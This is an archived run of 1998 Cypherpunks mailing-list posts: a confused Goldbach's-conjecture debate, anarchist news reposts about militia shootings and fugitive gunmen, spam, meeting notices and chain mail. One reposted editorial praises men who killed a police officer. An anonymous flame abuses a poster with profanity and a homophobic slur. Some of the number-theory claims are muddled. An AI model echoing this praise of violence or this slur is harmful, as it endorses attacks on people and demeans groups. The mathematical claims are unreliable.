> of course, since evenness means divisibility by two.)"

Ok, so this one says it was Goldbach himself and in particular states two
odd primes completely eliminating 4 from the get go ...

> >From _Excursions in Number Theory_ by C. Stanley Ogilvy and John T.
> Anderson, pg. 82:
>
> "Goldbach's conjecture. Is every even number expressible as the sum of two
> primes?"

This one is the second version...

> >From _Goldbach's Conjecture_ by Eric W. Weisstein
> (http://www.astro.virginia.edu/~eww6n/math/GoldbachConjecture.html):
>
> "Goldbach's original conjecture, written in a 1742 letter to Euler, states
> that every Integer >5 is the Sum of three Primes. As re-expressed by
Euler,
> an equivalent of this Conjecture (called the ``strong'' Goldbach
conjecture)
> asserts that all Positive Even Integers >= 4 can be expressed as the Sum
of
> two Primes."

And finaly a third completely different slant. They at least get Fermats
contribution right.

> Am I misreading somewhere?

Well I'd say that all three of your references tended to contradict each
other. Which one do you want to stand on?

This is my quote:

> No, that was Fermat, Goldbach just says every even number greater than two
> can be represented as a sum of primes. Basicaly Fermat says that if we
have
> n primes we can reduce them to 2 primes only, in all cases. Which happens
to
> exclude using equilateral triangles as a test bed since you can't tile a
> equilateral with only two other equilaterals, you could use rectangles
> though. So basicaly from a geometric perspective Fermat says that given a
> rectangle of even area it is possible to divide it with a bisector into
two
> rectangles of prime area.
>
> It's interesting that Fermat doesn't mention that the only prime that can
> use two as a factor is 4. And you can't factor 2 at all since we eliminate
> 1 as a potential candidate (another issue of symmetry breaking simply so
we
> don't have to write '....works for every prime but 1' on all our
theorems).

I'll stand by this statement.


    ____________________________________________________________________

            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blake Buzzini" <bab282@psu.edu>
Date: Sat, 21 Nov 1998 02:33:08 +0800
To: "CypherPunks" <cypherpunks@Algebra.COM>
Subject: RE: Goldbach's Conjecture (fwd)
In-Reply-To: <199811201515.JAA10514@einstein.ssz.com>
Message-ID: <002901be14ac$575bd880$88e3ba92@ruby-river>
MIME-Version: 1.0
Content-Type: text/plain



A group is only as useful as the special and similar properties items in the
group share. Primes are no exception. One isn't included in the set of
primes because it has special properties beyond or inconsistent with the
properties of primes. As to the notion that implementing your brilliant idea
"would [perhaps] provide a more consistent base and just maybe some of the
extant problems in number theory might become solvable in other ways", all I
can say is Puhleez... In Gauss, Fermat, Wiles, et al versus Jim Choate, I'd
put my money on the former.

Sorry for the rude response, I just don't like being sent hostile messages
to my personal email account.

Blake Buzzini, PSU

-----Original Message-----
From:	owner-cypherpunks@Algebra.COM [mailto:owner-cypherpunks@Algebra.COM]
On Behalf Of Jim Choate
Sent:	Friday, November 20, 1998 10:16 AM
To:	Cypherpunks Distributed Remailer
Subject:	RE: Goldbach's Conjecture (fwd)


Forwarded message:

> Date: Fri, 20 Nov 1998 09:41:01 -0600
> From: Mark Hahn <mhahn@tcbtech.com>
> Subject: RE: Goldbach's Conjecture (fwd)

> At 09:39 PM 11/19/98 -0600, Jim Choate instructed:
> >It's interesting that Fermat doesn't mention that the only prime that can
> >use two as a factor is 4. And you can't factor 2 at all since we
eliminate
> >1 as a potential candidate (another issue of symmetry breaking simply so
we
> >don't have to write '....works for every prime but 1' on all our
theorems).
>
> I thought I was following along until I got here, and got very lost. First
> question: I think the first sentence implies 4 is prime, so I must have
> the emphasis wrong.

No, I made a typo. I got so focused on primes last nite that I seem to have
typed it in instead of 'even'. I didn't notice it when I saw it posted to
the list. My mistake, sorry for the confusion.

What started this whole enquiry for me was the realization that the
multiplication identity axiom is related to the definition of a prime. Then
add on top of that the reason we exclude 1 is so we don't have to write
'...except for the prime 1' on the end of lots of number theory (re Richard
Feynman's comment during the Challenger Investigation). It was the
realization that if we go ahead and include 1 so the axioms are in line with
each other (and use our cut&paste feature for the '...1...') then perhaps it
would provide a more consistent base and just maybe some of the extant
problems in number theory might become solvable in other ways. My original
intention was to get a copy of Doug Lenat's EURISKO theorem proving program
and change the definition of prime in its database and note the results
(after converting it to Perl from LISP). What started all that is that I'm
slowly going through 'An Introduction to Algebraic Structures' by J. Landin
(Dover) creating a cheat-sheet of number theory that eventualy I hope to
post
on my webpage for reference.


    ____________________________________________________________________

            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 21 Nov 1998 04:08:10 +0800
To: secret_squirrel@nym.alias.net (Secret Squirrel)
Subject: Re: Militiamen Assault Federal Command Post
In-Reply-To: <ba3dcb83cb2e8944b3c47f14b35aed64@anonymous>
Message-ID: <199811201901.NAA18802@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



I am not convinced that the bullets that struck the command post
were not simply hunting bullets that went astray.

igor

Secret Squirrel wrote:
> 
> 
> Date: Tue, 17 Nov 1998 12:22:20 -0500
> From: Anarchist News Service <news@overthrow.com>
> Reply-To: "news@overthrow.com" <news@overthrow.com>
> Organization: Utopian Anarchist Party
> MIME-Version: 1.0
> Newsgroups:
> 
> alt.anarchism,alt.society.anarchy,alt.law-enforcement,alt.politics.youth,alt
> 
> .society.high-school,alt.politics.radical-left,dc.general,alt.evil,alt.nuke.
> 
> the.USA,alt.parents.stupid,alt.politics.drinking-age,alt.politics.libertaria
> n,alt.politics.
> To: "news@overthrow.com" <news@overthrow.com>
> Subject: Militiamen Assault Federal Command Post;  Shots Exchanged, No
> Injuries
> 
> Militiamen Assault Federal Command Post
> Shots Exchanged, No Injuries
> 
> November 17, 1998
> 
> Andrews, NC -- An unknown number of militiamen attacked a federal
> command post late last week, exchanging fire with agents.  No injuries
> on either side were reported, and the unknown number of militiamen were
> said to have fled.  The Rudolph Command Post, in Andrews NC, is the base
> from which more than 200 federal agents are conducting a search for Eric
> Rudolph, suspected bomber of a number of abortion clinics and of the
> 1996 Olympics.
> 
>     Federal agents say that bullets whizzed by their heads and that one
> agent was barely grazed when nearly a dozen shots were fired into their
> headquarters.
> 
>     Eric Rudolph, 32, has been charged in numerous bombings, including
> one that killed a police officer, and has fled into the woods of Western
> North Carolina.  The eighty agents that had been assigned to the case,
> until recently, when their number was boosted to 200, have been unable
> to locate Rudolph.  ANS correspondants on the scene that the local
> residents overwhelmingly support Rudolph, and that many have pledged
> that they would support and shelter him if they felt it necessary.
> 
>     Rudolph is linked to far-right Christian organizations.  ANS's North
> Carolina correspondents are not sympathetic to these organizations.
> 
> -----
> 
> For more anarchist news and information, contact:
> 
>     Utopian Anarchist Party
>     Post Office Box 12244
>     Silver Spring, MD 20908
> 
>     uap@overthrow.com
>     http://www.overthrow.com
> 
> 
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: custer@ravenhillstudios.com
Date: Sat, 21 Nov 1998 06:43:09 +0800
To: <cypherpunks@toad.com>
Subject: Raven Hill Videos As Low As $6.99
Message-ID: <199811202156.NAA09781@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Valued Customer,

     Raven Hill Studios Spanking Videos As low as $6.99.  This is 
not a Joke.  Come to our new site for complete details.
http://www.ravenhillstudios.com
http://www.ravenhillstudios.com
http://www.ravenhillstudios.com

Thank You 
Aaron 
Webmaster
Raven Hill Studios
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DOOM Anonymous Untraceable User <nobody@seclab.com>
Date: Fri, 20 Nov 1998 21:10:28 +0800
To: cypherpunks@cyberpass.net
Subject: Pothead Survivalists Elude Massive Search
Message-ID: <199811201230.NAA06988@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Wed, 18 Nov 1998 17:53:29 -0500
From: Anarchist News Service <news@overthrow.com>
Reply-To: news@overthrow.com
Organization: Utopian Anarchist Party
MIME-Version: 1.0
To: "news@overthrow.com" <news@overthrow.com>
Subject: Pothead Survivalists Elude Massive Search;  One Dead, Two Still
Eluding a Continent-wide Manhunt

Pothead Survivalists Elude Massive Search
One Dead, Two Still Eluding a Continent-wide Manhunt

November 18, 1998
Reprinted from Revolutionary Times, November, 1998
Much thanks to our comrade and friend of anarchy, Terry Mitchell, editor
of Revolutionary Times

Cortez, Colorado -- Like the plot of a farfetched Hollywood movie, three
potheads have proven impossible for police and the military to catch,
and the cops are stumped.
    On May 29th, police officer Dale Claxton stopped a stolen water
truck 50 miles east of Cortez, Colorado.  Before he could exit his
patrol car, three men, dressed in camouflage military fatigues, raked
his car with rifle fire.  He was struck four times and killed.  The
chase was on, and the three were determined not to be captured.
    Then men then drove to their own pickup and continued on with their
water truck.  It didn't take long for police backups to discover officer
Claxton's body and put out an All Points Bulletin.  A short while later,
another lone policeman stopped the water truck, lights flashing.  As he
sat behind the large tanker, a pickup pulled up behind him and stopped.
One camo clad man, wearing a combat helmet, rose up from the pickup bed,
pointed his rifle over the top, and began firing.  At the same time, the
drive reemerged from the pickup, blasting away at the cop.  The officer
was struck in the back, covered by his bulletproof vest, and his leg.
Then, seeing he was down and dazed, they abandoned the tanker and sped
off again.
    Police set up roadblocks on all the key roads, expecting to be able
to use "stop sticks" and their cars to apprehend the shooters.  But, the
savvy survivalists raced up, guns blazing, and literally shot their way
through a state-of-the-art roadblock.  Afterwards, police picked up
close to 5000 spent casings.
    The skill and boldness of the three left Colorado police stunned and
frightened.  They had no idea who the three were and, had it not been
for a bitter ex-girlfriend who snitched them out, they never would
have.  She identified the men as Alan "Monty" Pilon, 30, Jason McVean,
26, and Robert Mason, 26.
        Police quickly raided the mobile homes of the three, ripping
them to shreds.  At one home they found a pickup truck loaded with food,
ammunition and other gear;  as though they had been planning to leave
for the countryside as soon as they had secured the water truck.  At
another of the three's home, police found a small amount of weed, a
pipe, and a pack of papers.  Also found was a map indicating the
locations of 17 cache sites in the desert mountain region.
        As with any situation where the powers of the state were
challenged, the government responded with overwhelming force;  an army
of 200 National Guard and active duty military, plus 300 state, local
and federal police.  An enormous manhunt began for the trio in western
Colorado and eastern Utah.
    Helicopters using latest-generation night vision equipment scoured
the cliffs and valleys in vain.  Special listening, motion and heat
sensing equipment was brought in, but detected no movement or sound that
could lead them to the three.
    Police found the pickup abandoned with tracks leading into the
brush.  But this presented another problem;  FBI and Colorado SWAT teams
going through the tamarisk complained "they can stand ten feet apart and
not see each other."
    A geyser of propaganda erupted, claiming the three were suspects in
the robbing of a gambling casino a year before and that they were
members of the Four Corners Militia.  These lines were repeated over and
over in print and on television.  But there were obvious holes in the
stories.  First, there is no Four Corners Militia.  The entire militia
connection was a fabrication designed to smear all paramilitary groups
with a broad brush.  Second, if the men were suspects, why had they
never been picked up or even questioned about the robberies?
    On July 5th, a Colorado social worker driving along a desert highway
spotted a pair of combat boots beside the road.  Having heard all the
intense "gotta hate 'em" propaganda, he quickly dialed the police on his
cell phone.  But this was not going to be just another easy snitch.  As
he sat looking at the surrounding area, he caught the reflection of
sunlight off the telescopic sight of a rifle.  Just then the dirt began
to kick up around him with bullet strikes, and he sped away to clean up
his pants.
    Sheriff's Deputy Kelley Bradford raced to the scene, only to be met
with a hail of gunfire that left him shot twice and lucky to be alive.
That brought the total to one policeman killed, four wounded, and six
police cars riddled by bullets.  The cops were freaking out.
    Then came a strange twist to the tale.  Robert Mason was found dead,
a victim of what police claim was a suicide.  His body was found in a
bunker-like structure just back from the highway were his boots were
set.  He was wearing body armor and had several pipe bombs near him.
Oddly enough, he was shot between the eyes, a place rarely chosen for
suicide.  He  may have actually been executed on the spot by the police,
or shot by his accomplices.
    Cooperation between local police agencies and Navajo Nation police
was sabotaged by racism from the white officers.  Navajo police
complained that their reports of sightings of the men were ignored.
Local police responded by saying the Navajos "were difficult to work
with."  SWAT teams ran here and there chasing reports that came in
through their sources.
    Searchers found the 17 cache sites marked on a map discovered at one
of the residences, but they had already been cleaned out.  The map had
actually been turned over to the US Army Topographical Intelligence
Division where sites were matched to military maps, which were then
given to the police.
    The mighty Colorado River was effectively closed off to bat traffic,
with rafters pulled to the shore by police and questioned.  A ban on
boating was put into place for a time, but was called off after it began
to impact local economies.
    At the present time, the search has been scaled back significantly.
Blackhawk helicopters make routine patrols over the Colorado/Utah
borders looking for the two surviving masked me.  Rumors are flying in
Colorado, with the latest being that the two are being hidden by local
supporters.

-----

Editor's (Terry Mitchell's) commentary:  While I do not support the
theft of other people's vehicles, I have a high respect for the
determination of the three to not be stopped.  Had they pooled their
money, all were gainfully employed, and bought a water truck instead of
stealing one, the entire incident would not have happened.  From the
looks of things, the theft was part of their plan to immediately pull
back from the cities and into the desert.  Do they know something we
don't?
    Their struggles have revealed something important to all oppressed
victims of the War on Drugs -- the emperor truly wears no clothes.  We
have all heard about how high-tech devices used by the police and
military can "count the kernels on an ear of corn from outer space" and
how their is no longer any place to hide.  Well, this is bullshit.
Those pot smoking gunmen have proven that people can fight the
government  , win, and disappear indefinitely.  Big Brother isn't as
tough as he would have you believe.  "Pay no attention to the man behind
the curtain."

-----

    Terry Mitchell is editor of Revolutionary Times and head of the
Green Panthers, a radical marijuana legalization organization.  The
Green Panthers can be reached at http://www.greenpanthers.org , at
panthers@eos.net . or at Panthers Press, PO Box 31231, Cincinnati, OH
45231, 513-522-6264, Fax:513-522-6234 .
    The Green Panthers provide free referrals to defense lawyers who
specialize in marijuana defense in all 50 states, among other
activities.
    Revolutionary Times is printed by Panthers Press and can be reached
at the above address.  A one-year subscription costs $20.  Other
contributors to Revolutionary Times includes Thomas Chittum, author of
Civil War II:  The Coming Breakup of America , soon to be available in
the UAP Book's "Leaders of the Far Right" section at
http://www.overthrow.com , and available now from UAP Book and is
Amazon.com at

http://www.amazon.com/exec/obidos/ASIN/0929408179/utopiananarchist .

-----

For more anarchist news and information, contact:

    Utopian Anarchist Party
    Post Office Box 12244
    Silver Spring, MD 20908

    uap@overthrow.com
    http://www.overthrow.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Sat, 21 Nov 1998 03:21:29 +0800
To: "'bill.stewart@pobox.com>
Subject: January Bay Area meeting date.
Message-ID: <D104150098E6D111B7830000F8D90AE84DDF96@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



The 1999 RSA Data Security Conference will be held
in San Jose, Sunday January 17th thru Thursday,
January 21. It will bring a lot of out-of-town
members of these mailing lists into the Bay Area.

Last year, the date of the January Cypherpunks
Physical Meeting was shifted so that conference
attendees who stayed over the weekend could turn
up. Several did, and I gave a repeat performance
of my conference presentation.

I'd like to suggest shifting the date again. The 
physical meetings seem to be normally held second 
Saturdays, which  suggests a Jan 9 date. If it 
could be moved up to the 16th, people could 
arrive on Friday (or early Saturday) and 
attend the cpunk meeting. Many conference
attendees will be staying over that Saturday
night to take advantage of the cheaper airfares.

Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Sat, 21 Nov 1998 08:30:13 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <83762d986d152f062f0bd96df4654a34@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 19 Nov 1998, Bernardo B. Terrado wrote:

>| Date: Thu, 19 Nov 1998 11:46:14 +0800 (CST)
>| From: Bernardo B. Terrado <bbt@mudspring.uplb.edu.ph>
>| To: Jim Gillogly <jim@acm.org>
>| Cc: cypherpunks@toad.com, coderpunks@toad.com
>| Subject: manners and piracy
>|
>| I don't intend to pirate anything or make someone do  it in any case.
>|
>| Well anyway thank you for your reply.
>| What I'm trying to point out is this
>|   it is OK with me if you say "Take your piracy requests elsewhere"
>|   it is not OK with me if you say " ...fuck yourself"
>|

Bernardo Terrado:  take your motherfucking, goddamned sorry warez ass to FUCKING hell!

personally, i have nothing against an individual who wants to get some free shitty pirated software (*i'm* certainly NO warez pup, mind you), i'm a very open-minded anarchist/libertarian, i use Linux, GNUware, etc...(shit!  those bloodsucking faggots at the IRS have enough to develop a profile of me now), but what *really* FUCKING offends me is when some cocksmoker like your sorry fucking "Rico Suave" self come onto this list and gets FUCKING offended by a motherFUCKing word like "FUCK".

FUCK YOU Bernardo!  no wait, F U C K  Y O U, bernardo!  FUCK YOU.

Sincerely FUCK OFF, Bernardo, you stupid fucknut.

 -- PureFUCK, just another disgruntled taxpayer

 -- fingerFUCK Bernardo's mom for PureFUCK's PGP key

>| gets?
>|
>| On Wed, 18 Nov 1998, Jim Gillogly wrote:
>|
>| > Bernardo B. Terrado wrote:
>| > > > Could someone give me a copy of statgraphics for dos or windows?
>| > > > I would gladly appreciate it.
>| >
>| > and then took issue with somebody obscenely taking him to task for
>| > asking these lists for a pirated version of this software:
>| >
>| > > Well I thought this list was a list of intellectuals, not only good in
>| > > hacks and coding and programming and the likes but also well "tailored"
>| > > with their manners,
>| >
>| > Bernardo, this package costs in the neighborhood of $900 US.  What makes
>| > you think the mannered intellectuals you expect to find on these
>| > lists would either condone or contribute to software piracy on this
>| > scale?  Or that they would not take violent verbal objection to the
>| > suggestion that they would do so?
>| >
>| > Take your piracy requests elsewhere.  These aren't warez lists.
>| > --
>| >    Jim Gillogly
>| >    29 Blotmath S.R. 1998, 01:12
>| >    12.19.5.12.12, 4 Eb 5 Ceh, Ninth Lord of Night





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mib <mib@io.com>
Date: Sat, 21 Nov 1998 06:43:40 +0800
To: cypherpunks@einstein.ssz.com
Subject: The Missing Thirteenth Amendment
Message-ID: <3655E706.14A0D644@io.com>
MIME-Version: 1.0
Content-Type: text/plain



The Missing Thirteenth Amdendment
http://www.nidlink.com/~bobhard/orig13th.html

- d.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sat, 21 Nov 1998 02:07:46 +0800
To: cypherpunks@cyberpass.net
Subject: packet socket forwarder
Message-ID: <19981120172017.27052.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have a simple packet forwarder to run
on a unix system? I want to set up a daemon on an
account to just redirect traffic from a particular port
to another host for some basic anonymity, but I don't
have experience doing socket coding, nor a book.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@cor.sos.sll.se>
Date: Sat, 21 Nov 1998 01:14:29 +0800
To: cypherpunks@cyberpass.net
Subject: Anon GSM in New York?
In-Reply-To: <99c4e400f183f816a06750cf9b8dc791@anonymous>
Message-ID: <Pine.HPP.3.91.981120172759.24703A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Since I'll be visiting New York shortly I wonder if there are
any GSM-net provider there issuing anonymous sim cards for cash
that would fit in my Ericsson SH888?

Asgaard 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <secret_squirrel@nym.alias.net>
Date: Sat, 21 Nov 1998 02:43:29 +0800
To: cypherpunks@cyberpass.net
Subject: Militiamen Assault Federal Command Post
Message-ID: <ba3dcb83cb2e8944b3c47f14b35aed64@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Date: Tue, 17 Nov 1998 12:22:20 -0500
From: Anarchist News Service <news@overthrow.com>
Reply-To: "news@overthrow.com" <news@overthrow.com>
Organization: Utopian Anarchist Party
MIME-Version: 1.0
Newsgroups:

alt.anarchism,alt.society.anarchy,alt.law-enforcement,alt.politics.youth,alt

.society.high-school,alt.politics.radical-left,dc.general,alt.evil,alt.nuke.

the.USA,alt.parents.stupid,alt.politics.drinking-age,alt.politics.libertaria
n,alt.politics.
To: "news@overthrow.com" <news@overthrow.com>
Subject: Militiamen Assault Federal Command Post;  Shots Exchanged, No
Injuries

Militiamen Assault Federal Command Post
Shots Exchanged, No Injuries

November 17, 1998

Andrews, NC -- An unknown number of militiamen attacked a federal
command post late last week, exchanging fire with agents.  No injuries
on either side were reported, and the unknown number of militiamen were
said to have fled.  The Rudolph Command Post, in Andrews NC, is the base
from which more than 200 federal agents are conducting a search for Eric
Rudolph, suspected bomber of a number of abortion clinics and of the
1996 Olympics.

    Federal agents say that bullets whizzed by their heads and that one
agent was barely grazed when nearly a dozen shots were fired into their
headquarters.

    Eric Rudolph, 32, has been charged in numerous bombings, including
one that killed a police officer, and has fled into the woods of Western
North Carolina.  The eighty agents that had been assigned to the case,
until recently, when their number was boosted to 200, have been unable
to locate Rudolph.  ANS correspondants on the scene that the local
residents overwhelmingly support Rudolph, and that many have pledged
that they would support and shelter him if they felt it necessary.

    Rudolph is linked to far-right Christian organizations.  ANS's North
Carolina correspondents are not sympathetic to these organizations.

-----

For more anarchist news and information, contact:

    Utopian Anarchist Party
    Post Office Box 12244
    Silver Spring, MD 20908

    uap@overthrow.com
    http://www.overthrow.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: palmdeveloper@palmdevcon.com
Date: Sat, 21 Nov 1998 10:28:09 +0800
To: cypherpunks@toad.com
Subject: Register Today for Palm Dev Con -- Win Great Prizes!
Message-ID: <199811210203.SAA11016@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Be a Part of the New Force in Handheld Computing! 

Point your browser to http://www.palmdevcon.com and register now for the 1998 Palm Computing 
Platform Worldwide Developer Conference.

Hear Keynotes from the industry's leading experts in handheld computing including Mark Bercow, Jeff 
Hawkins, Donna Dubinsky and more!

Choose from over 90 hours of sessions --including introductory & advanced technical, sponsor, and 
business and enterprise sessions. 

And, be the first to see hot new and pre-release technologies! 

Register TODAY! http://www.palmdevcon.com 

Those who pre-register qualify to win great prizes, including Palm devices for a year and a trip to 
SuperBowl XXXIII!  (On-site registrants will not be eligible, so register now!) 


Your email was included on a list provided by Palm Computing, Inc.  Should you wish to be deleted from 
this list, please respond back to "postmaster@palmdevcon.com".    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Sat, 21 Nov 1998 02:31:13 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Goldbach's Conjecture (fwd)
In-Reply-To: <199811201515.JAA10514@einstein.ssz.com>
Message-ID: <3655A68B.CB9EE8DE@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

> What started this whole enquiry for me was the realization that the
> multiplication identity axiom is related to the definition of a prime. Then
> add on top of that the reason we exclude 1 is so we don't have to write
> '...except for the prime 1' on the end of lots of number theory (re Richard
> Feynman's comment during the Challenger Investigation). It was the
> realization that if we go ahead and include 1 so the axioms are in line with
> each other (and use our cut&paste feature for the '...1...') then perhaps it
> would provide a more consistent base and just maybe some of the extant
> problems in number theory might become solvable in other ways. My original
> intention was to get a copy of Doug Lenat's EURISKO theorem proving program
> and change the definition of prime in its database and note the results
> (after converting it to Perl from LISP). What started all that is that I'm
> slowly going through 'An Introduction to Algebraic Structures' by J. Landin
> (Dover) creating a cheat-sheet of number theory that eventualy I hope to post
> on my webpage for reference.

If you 'define' 1 to be 'prime', you are 'defining' Goldbach's
conjecture 'away'! 

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Sat, 21 Nov 1998 03:21:29 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Goldbach's Conjecture (fwd)
In-Reply-To: <199811201733.LAA11400@einstein.ssz.com>
Message-ID: <3655B4B9.77434085@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 

> 
> I'll give you a hint, more than that single problem goes away.

But what would you gain in return for your defining 1 to be prime?

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: francearewcwinners@juno.com (Real Madrid)
Date: Sat, 21 Nov 1998 09:57:51 +0800
To: FranceareWCwinners@juno.com
Subject: Re: Top players in the world revised:
Message-ID: <19981120.202740.-66453.2.FranceareWCwinners@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



!!   FOR YOUENGLISH FANS   !!! FOR YOU BRITS  !!!VILLA  MANCHESTER 
ARSENAL   !!

These are some very good revised players that could be called the best in
the 
world-no number ranks! You oppinions Matter! alittle.  Pass on to 
soccer lovers!  Add! Take away! There are English now

>INCE-ENGLAND-LIVERPOOL-DEFENSIVE MIDFIELD
>OWEN-ENGLAND-LIVERPOOL-STRIKER-ONLY 18!!!!!
>BECKHAM-ENGLAND-MANCHESTER UNITED-MIDFIELD
>ADAMS-ENGLAND-ARSENAL-SWEEPER
>CAMBELL-ENGLAND-MANCHESTER UNITED-DEFENDER
	HAPPY NOW ALLAN+JEFF
>Zidane- France-Juventus-Attacking midfield
>Ronaldo-Brazil-Inter-Striker
>Thuram-France-Parma-Defender
>Chivalert-Paraguay-River Plate-Goal Kepper 
>Davids-Holland-Juventus-Defensive Midfield
>R.Carlos-Brazil-Real Madrid- WIDE Defender
>Hierro-France-Real Madrid-Center Defender
>Raul-Spain-Real Madrid-Attacking Midfield/Striker
>Seedorf-Holland-Real Madrid-Midfield
>Rivaldo-Brazil-Barcelona-Attaking Midfield
>Dessally-France-Chelsea-Center Defender
>Frank De Boer-Holland-Ajax-Center Defender
>Van der Sar-Holland-Ajax-Goal Keeper
>Del Piero-Italy-Juventus-Striker
>Mijatovic-Yugoslovia-Real Madrid-Striker
>Suker-Croatia-Real Madrid-Striker
		IS THIS OK RYANS GOING BACK TO PAXON JAV!!!!!
___________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com/getjuno.html
or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: francearewcwinners@juno.com (Real Madrid)
Date: Sat, 21 Nov 1998 09:54:27 +0800
To: franceareWCwinners@juno.com
Subject: Top teams revised FOR YOU BRITS
Message-ID: <19981120.202740.-66453.3.FranceareWCwinners@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



	HERE HERE HERE ALLAN AND JEFF ARE YOU HAPPY no numbers
>ASTON VILLA
>MANCHSETER UNITED
>ENGLAND
>real madrid
>holland
>FEYNORD
>france
>itlay
>brazil
>BAYERN MUNICH
		HAPPY ALLAN ARE YOU get me that deal with NIKE
___________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com/getjuno.html
or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zzq2@juno.com (John P Walker)
Date: Sat, 21 Nov 1998 11:32:02 +0800
To: cypherpunks@toad.com
Subject: Fw: Re: Top players in the world revised:
Message-ID: <19981120.220631.-1897.2.zzq2@juno.com>
MIME-Version: 1.0
Content-Type: text/plain





--------- Forwarded message ----------
From: francearewcwinners@juno.com (Real Madrid)
To: FranceareWCwinners@juno.com
Cc: cypherpunks@toad.com, skain0285@aol.com, agreaves@netreach.net,
	 Jav885@aol.com, zzq2@juno.com, greg@juno.com,
	 UBshaggin@aol.com, SB0702@aol.com, SlvurCloud@aol.com,
	 Tippy51587@aol.com, Shon941@aol.com, Michael200000@juno.com,
	 schnook27@aol.com, 007@aol.com, scottbrown@Exeloncorps.com,
	 ray@aol.com, errorlie@aol.com, case_s@aol.com,
	 LalaJeff@aol.com, bob@aol.com, Hotgirl@aol.com,
	 dazedcow@aol.com, ronaldo@aol.com, RealMadrid@aol.com,
	 dumbblonde@aol.com, prostitute@aol.com, johnsmith@aol.com,
	 nudegirl@aol.com, umb@aol.com, joe@aol.com, janitor@aol.com
Date: Fri, 20 Nov 1998 20:22:41 -0500
Subject: Re: Top players in the world revised:
Message-ID: <19981120.202740.-66453.2.FranceareWCwinners@juno.com>

!!   FOR YOUENGLISH FANS   !!! FOR YOU BRITS  !!!VILLA  MANCHESTER 
ARSENAL   !!

These are some very good revised players that could be called the best in
the 
world-no number ranks! You oppinions Matter! alittle.  Pass on to 
soccer lovers!  Add! Take away! There are English now

>INCE-ENGLAND-LIVERPOOL-DEFENSIVE MIDFIELD
>OWEN-ENGLAND-LIVERPOOL-STRIKER-ONLY 18!!!!!
>BECKHAM-ENGLAND-MANCHESTER UNITED-MIDFIELD
>ADAMS-ENGLAND-ARSENAL-SWEEPER
>CAMBELL-ENGLAND-MANCHESTER UNITED-DEFENDER
	HAPPY NOW ALLAN+JEFF
>Zidane- France-Juventus-Attacking midfield
>Ronaldo-Brazil-Inter-Striker
>Thuram-France-Parma-Defender
>Chivalert-Paraguay-River Plate-Goal Kepper 
>Davids-Holland-Juventus-Defensive Midfield
>R.Carlos-Brazil-Real Madrid- WIDE Defender
>Hierro-France-Real Madrid-Center Defender
>Raul-Spain-Real Madrid-Attacking Midfield/Striker
>Seedorf-Holland-Real Madrid-Midfield
>Rivaldo-Brazil-Barcelona-Attaking Midfield
>Dessally-France-Chelsea-Center Defender
>Frank De Boer-Holland-Ajax-Center Defender
>Van der Sar-Holland-Ajax-Goal Keeper
>Del Piero-Italy-Juventus-Striker
>Mijatovic-Yugoslovia-Real Madrid-Striker
>Suker-Croatia-Real Madrid-Striker
		IS THIS OK RYANS GOING BACK TO PAXON JAV!!!!!
___________________________________________________________________ You
